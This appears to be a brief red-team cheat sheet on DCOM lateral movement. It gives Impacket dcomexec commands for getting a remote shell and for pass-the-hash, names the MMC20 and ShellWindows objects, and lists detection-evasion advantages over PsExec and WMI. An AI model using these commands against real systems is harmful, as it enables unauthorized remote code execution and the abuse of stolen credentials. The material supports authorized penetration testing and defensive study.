Overview
DCOM (Distributed Component Object Model) allows remote COM object interaction. Several COM objects support command execution. Uses port 135 + dynamic high ports.Impacket — dcomexec
Specify Object
PowerShell — MMC20.Application
PowerShell — ShellWindows
Advantages
- Less monitored than SMB-based tools
- No service creation
- No binary upload
- Different network signature than PsExec/WMI
Requirements
- Admin rights on target
- RPC (135) + dynamic high ports accessible
- DCOM enabled on target
Quick Reference
| Task | Command |
|---|---|
| Shell | impacket-dcomexec DOMAIN/user:pass@TARGET |
| PtH | impacket-dcomexec DOMAIN/user@TARGET -hashes :HASH |
| MMC20 | -object MMC20 |
| ShellWindows | -object ShellWindows |